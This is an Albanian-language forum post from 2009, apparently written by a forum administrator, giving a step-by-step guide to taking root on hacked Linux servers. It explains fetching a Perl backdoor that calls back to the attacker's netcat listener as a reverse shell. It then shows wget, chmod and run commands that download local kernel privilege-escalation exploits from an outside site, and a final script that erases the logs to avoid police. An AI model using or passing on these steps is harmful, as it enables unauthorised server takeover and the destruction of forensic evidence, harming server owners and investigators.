...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Si ta hackojm një root

Shko poshtë 
AutoriMesazh
TRo0PiX
Administrator
Administrator
avatar

Numri i postimeve : 152
Join date : 21/04/2009

MesazhTitulli: Si ta hackojm një root   Tue May 12, 2009 3:24 pm

Pik se pari

Cka eshte Root ?

Root thiret tash ne Standart nga krej user me Krejt te Drejtat
Ne Ndonje Sistem Pra Live me then si Pronari i Serverit

Si me e thy ate ku me gjet si me hy

Per ty hy me 1 root legal apo ilegal qe keni hack ju nevoitet PuTTy
mund te beni download Ketu
http://www.chiark.greenend.org.uk/~s.../download.html
http://www.tartarus.org/~simon/putty.../x86/putty.exe


Ku me e gjet 1 server qe ta hackerojm
Pasi qe e keni lexuar mesimin tim tjeter Si me Hack Uebfaqe me File Include
kur te hyni ne Server do tju nevoitet Backdoor per me e hack Rooten ne at
Uebfaqe qe e keni hack

Si ku dhe cka eshte Backdoor ?

backdoor eshte nje dritare e hapur nje lidhje pas me serverin qe mundeni me u kyq
me NETCAT!

Cka eshte Netcat ?

Netcat eshte nje program i vogel qe e leshon ne Pc me e prit 1 Lidhje nga backdoori pra e
Aktivizoni Netcat ne pc e juaj hyni ne webin qe e keni hack wget webi.com/backdoor
pastaj e leshoni " perl backdoor IPeJuaj porti " dhe backdoor scripti provon te lidhet
me Pc e juaj ne at portin qe e keni shenu ne NETCAT me e prit lidhjen Dhe lidheni me
Sistemin qe e keni hack pasi te lidheni

komanden: uname -a " e shikoni versionin e KERNEL te unix sistemit "

Nese eshte 2.4 - 2003 - 2004 - 2005 - perdoreni Exploitin lokal " uselib24 "
Nese eshte 2.3 ose me posht version i vitit 2003 perdoreni explotin lokal " w00t "

Si me i perdor exploitat ?

Exploitat mund ti gjeni Ketu:
http://xpl.by.ru/

per w00t si me e perdor ?
wget http://xpl.by.ru/w00t
chmod 777 w00t
./w00t " prisni pak "
dhe shkruani komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.
------------
per uselib24
wget http://xpl.by.ru/uselib24
chmod 777 uselib24
./uselib24
Processon....
shkruan komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.

keshtu edhe exploita tjer mundeni me provu 100% funksionon testuar nga une personalisht
keni edhe exploita tjer aty krad,krad2,krad3 ,ptrace24<< per 2.4 etc.


Pasi kemi hackeruar me kille a mos te na nxan POLICIA a ?
po skeni shanca bre kurva interneti ua qim policin e nanes ketu keni pun me
CrAcKeR-NiNi veprojme....
Fshirja e " LOGS "
wget http://xpl.by.ru/MSRLE.txt
chmod 777 MSRLE.txt
perl MSRLE.txt
-------[+] !done all log files erased![+]-------
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Si ta hackojm një root
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Tutorials & Mesime-
Kërce tek: